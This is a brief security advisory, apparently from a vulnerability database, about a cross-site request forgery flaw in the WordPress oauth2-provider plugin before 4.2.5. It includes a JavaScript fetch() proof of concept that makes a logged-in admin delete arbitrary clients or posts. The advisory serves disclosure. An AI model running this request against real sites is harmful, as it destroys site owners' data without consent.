The plugin does not have CSRF check when deleting a client, and does not ensure that the object to be deleted is actually a client, which could allow attackers to make a logged in admin delete arbitrary client and post via a CSRF attack.
fetch(‘/wp-admin/admin-ajax.php’, { method: ‘POST’, headers: new Headers({ ‘Content-Type’: ‘application/x-www-form-urlencoded’, }), body: ‘action=wo_remove_client&data;=1’, redirect: ‘follow’ }).then(response => response.text()).then(result => console.log(result)).catch(error => console.log(‘error’, error));
CPE | Name | Operator | Version |
---|---|---|---|
oauth2-provider | lt | 4.2.5 |